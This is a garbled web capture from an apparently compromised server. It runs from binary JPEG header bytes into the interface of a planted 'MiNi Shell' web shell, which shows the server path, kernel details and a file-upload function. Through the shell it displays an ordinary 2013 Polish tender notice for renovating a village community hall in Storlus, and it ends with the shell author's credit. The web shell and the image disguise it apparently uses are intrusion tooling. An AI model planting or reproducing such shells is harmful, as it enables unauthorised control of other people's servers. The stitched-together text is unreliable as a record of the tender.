JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130129/15495-N-2013.html

<p class="kh_header"><b>Papowo Biskupie: Remont i wyposażenie świetlicy wiejskiej w miejscowości Storlus</b><br>
<b>Numer ogłoszenia: 15495 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Papowo Biskupie , Papowo Biskupie 128, 86-221 Papowo Biskupie, woj. kujawsko-pomorskie, tel. 56 6768101, faks 56 6768101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.papowobiskupie.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i wyposażenie świetlicy wiejskiej w miejscowości Storlus.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont pomieszczeń i zakup
            wyposażenia świetlicy wiejskiej  w miejscowości Storlus , gmina Papowo
             Biskupie. Lokalizacja- budynek nr 26 ,działka nr 116 w obrębie Storlus
Realizacja zadania obejmuje wykonanie:
          1.Roboty rozbiórkowe i  remontowo-budowlane ,weranda i wejście
               1/Rozbiórka ścian z cegieł -12,22 m3
               2/Rozbiórka rynien i rur spustowych-13,27 m
               3/Rozbiórka obróbek blacharskich -4,76 m2
               4/Rozbiórka pokrycia z papy- 42,09 m2
               5/Rozbiórka elementów więźby dachowej -42,09 m2
               6/Rozbiórka stropów drewnianych podsufitek-37,28 m2
               7/Rozbiórka elementów konstr. betonowych schody -3,92 m3
               8/Tynki zewnętrzne- 40,56 m2
               9/Fundamenty z bloczków bet.1,48 m3
             10/Obróbki blacharskie-5,93 m2
             11/Balustrady schodowe,stalowe-16,94 m2
            12/Nawierzchnia z kostki brukowej gr.6 cm-42,09 m2
            13/J.w.-schody -13,42 m2


           2.Roboty remont.budowlane-sala
              1/Uzupełnienie ścian z cegieł-5,82 m2
                 2/Tynki wewn.-110,5 m2
                 3/Okładziny z płyt gipsowo-kartonowych sufity -66,36 m2
                 4/Wymiana drzwi na alumniowe oszklone -2,05 m2
                 5/Wymiana- ościeżnice drewniane -4,10 m2,montaż drzwi-2 szt.
                 6/Wymiana -kratki wentylacyjne- 1 szt.
                 7/Rozbiórka podłóg drewnianych- 66,36 m2
                 8/Podkłady z ubitych materiałów sypkich na podł.gruntowym-48,30 m3
                 9/Podkłady betonowe na podł. gruntowym -5,31 m3
               10/Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych-66,36 m2
               11/Izolacje przeciwwilgociowe i wodne  z folii- 66,36 m2
               12/Posadzki cementowe z cokolikami -66,36 m2
               13/Posadzki z płytek 30 x 30 cm -66,36 m2
               14/Wewn.gladzie gipsowe- na ścianach-101,18 m2
               15.Malowanie ścian i sufitów farbami emuls.-167,54 m2

         3.Roboty remont.budowlane-kuchnia
             1/Uzpełnienie ścian z cegieł-0,84 m2
             2/Tynki wewn.-39,55 m2
             3/Okładziny z płyt gipsowo-kartonowych sufity -12,61 m2
             4/Wymian-kratki wentylacyjne- 1 szt.
             5/Podkłady z ubitych materiałów sypkich na podł.gruntowym-12,61 m3
             6/Podkłady betonowe na podł.gruntowym -1,01 m3
             7/Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych-12,61 m2
             8/Izolacje przeciwwilgociowe i wodne  z folii- 12,61 m2
             9/Posadzki cementowe z cokolikami -12,61 m2
           10/Posadzki z płytek 30 x 30 cm -12,61 m2
           11/Wewn. gładzie gipsowe- na ścianach-39,55 m2
           12/Płytki  o wym.20 x 20 cm na ścianach -20,22 m2
           13/.Malowanie ścian i sufitów farbami emuls.-31,94 m2

         4.Roboty remont.budowlane-WC
             1/Uzupełnienie ścian z cegieł-17,86 m2
              2/Tynki wewn.-45,83 m2
              3/Okładziny z płyt gipsowo-kartonowych sufity -10,59 m2
              4/Wymiana-kratki wentylacyjne- 2 szt.
              5/Wymiana-ościeżnice drewniane -2 szt
              6/Wymiana drzwi- 2 szt..
              7/Rozebranie posadzki z cegły -10,59 m2
              8/Podkłady z ubitych materiałów sypkich na podł.gruntowym-1,06 m3
              9/Podkłady betonowe na podł.gruntowym -0,85 m3
            10/Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych-10,59 m2
            11/Izolacje przeciwwilgociowe i wodne  z folii- 10,59 m2
            12/Posadzki cementowe z cokolikami -10,59 m2
            13/Posadzki z płytek 30 x 30 cm -10,59 m2
            14/Płytki  o wym.20 x 20 cm na ścianach -34,17 m2
            15/Wewn.gladzie gipsowe- na ścianach-45,83 m2
            16/.Malowanie ścian i sufitów farbami emuls.-22,25 m2

       5.Montaż kominka wraz z wentylacją i nawiewem gorącego powietrza do
           istniejącego przewodu kominowego -1 kmpl.

        6.Roboty instalacyjne-wod.kan.
           1/Rurociągi stalowe ocynk.o śr.20 mm w ścianach -19,5 m
             2/Zawory przelotowe i zwrotne o średn.20 mm- 2 szt.
             3/Zawory czerpalne o śred. 15 mm do WC- 2 szt.
             4/Baterie umywalkowe  jednouchwytowe z 2 zaworami o średn.15 mm - 1 szt.
             5/Baterie zlewozmywakowych, jednouchwytowych z 2 zaworami o śred.15 mm -1 szt.
              6/Montaż przepływowego urządzenie do podgrzewania wody 3,5 kW- 2 kmpl.
              7/Rurociągi z PCV o średn.50 mm - 2,0 m
              8/Rurociągi z  PCV  knalizac. ośredn.110 mm- 15,50 m
              9/Montaż czyszczaka z PCV o średnicy 110 mm- 1 szt.
             10/Umywalka pojedyńcza, porcelanowa na postumencie - 1 szt.
             11/Zlewozmywak żeliwny, stalowy lub z tworzywa -1 szt.
             12/Ustępy pojedyncze z płuczkami na typ compact-2 kmpl.
             13/Rurociągi z PCV kanalizac. o średn.160 mm - 48,0 m
             14/Studzienka rewizyjna PCV o średn. 315 mm - 1 szt.

         6.Roboty instalacyjne-elektryczne.
             1/Przewody kabelkowe   układane w listwach i kanałach -350,0 m
               2./Tablica rozdzielcza-1 szt.
               3/Wyłącznik nadprądowy w rozdzielnicach- 2 szt.
               4/Rozłączniki przeciwporażeniowe w rozdzielnicach -2 szt.
               5/Puszki instalacyjne podtynkowe -35 szt.
                6/Łączniki -12 szt.
                7/Gniazda instalacyjne wtyczkowe ze stykiem ochronnym -25 szt.
                8/Oświetlenie na oprawy oświetleniowe, przykręcane- 25 kmpl

         7.Wyposażenie świetlicy.
              1/Stół konferencyjny ze składanymi, metalowymi chromowanymi nogami, blat o wymiarze
                 180x100 cm o grubości 18 mm z płyty laminowanej w kolorze buk, olcha, kalwados,wenge.
                 Wysokość stołu z blatem 73 cm-szt.6
               2/Krzesła stacjonarne ,stelaż krzesła chromowany, siedzisko tapicerowane skajem
                 lub tkaniną podstawową -40 szt.
Szczegółowy opis przedmiotu zamówienia zawiera:
                 1.Kosztorys ofertowy ślepy załącznik nr 2
                 2.Przedmiar kosztorysowy zał.nr 2a
                 3.Specyfikacja techniczna wykonania i odbioru robót budowlanych:
                   -szczegółowe specyfikacje techniczne wykonania i odbioru robót
                    zał.nr 9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem robót uzupełniających mogą być  takie same roboty jakie
         występują na zadaniu podstawowym o wartości nie większej niż 50%
         wartości zadania podstawowego.
         Orientacyjny,   zakres robót uzupełniających:
          Do 50% zakresu rzeczowego poszcz. pozycji przedmiaru kosztorysowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4, 45.11.12.00-0, 45.26.24.20-1, 45.26.25.00-6, 45.42.10.00-4, 45.43.00.00-0, 45.43.10.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.33.00.00-9, 45.23.24.60-4, 45.23.24.10-9, 45.33.12.10-1, 45.31.00.00-3, 45.31.11.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium 4000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  odstępuje od opisu sposobu dokonania oceny spełniania
   warunku.
   Ocena spełniania warunku w tym zakresie zostanie dokonana na podstawie
   złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że w ciągu
         ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres
         prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 
         2 roboty  budowlane, których przedmiotem zamówienia było wykonanie
          remontów budynków o podobnym zakresie, przebudowy lub budowy
        nowych budynków wartości każdej roboty minimum 120.000,00 zł.brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  odstępuje od opisu sposobu dokonania oceny spełniania
    warunku.
    Ocena spełniania warunku w tym zakresie zostanie dokonana na podstawie
    złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  odstępuje od opisu sposobu dokonania oceny spełniania
    warunku.
    Ocena spełniania warunku w tym zakresie zostanie dokonana na podstawie
    złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu
    i oświadczeniu, że osoby wyznaczone do kierowania robotami posiadają
   stosowne uprawnienia budowlane .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże ,że jest
           ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
           przez siebie działalności na kwotę minimum 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianie mogą ulec:
       1/ Termin zakończenia realizacji robót wynikający z:
           -przestojów i opóźnień leżących po stronie zamawiającego,
           -nagłych zdarzeń losowych mających wpływ na realizacje robót,
           -złych warunków atmosferycznych ,występujących przez okres
             uniemożliwiający  terminową realizację,
           -wystąpienia okoliczności, których strony ,mimo dołożenia należytej
             staranności  nie były w stanie przewidzieć.
         2/Wartość umowy w przypadku:
             -zmiany obowiązującej stawki podatku VAT
        3/Forma wniesienia zabezpieczenia należytego wykonania umowy w stosunku
           do wybranego  przez Wykonawcę w ofercie 
        4/Inne postanowienia umowy w przypadku:
             -konieczności wprowadzenia zmian w dokumentacji projektowej,
            -konieczności wprowadzenia zmian w technologii wykonania robót,
            -koniecznością użycia innych materiałów, lecz z zachowaniem
             dotychczasowych parametrów jakościowych i wytrzymałościowych,
            -zmiany inspektora nadzoru inwestorskiego,
            -zmiany osoby odpowiedzialnej za realizację robót-kierownika budowy 
              lub robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.papowobiskupie.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Papowo Biskupie,Papowo Biskupie 128,86-221 Papowo Biskupie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 10:00, miejsce: Urząd Gminy Papowo Biskupie,Papowo Biskupie 128,86-221 Papowo Biskupie
pok.nr 8 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich-Odnowa i Rozwój Wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com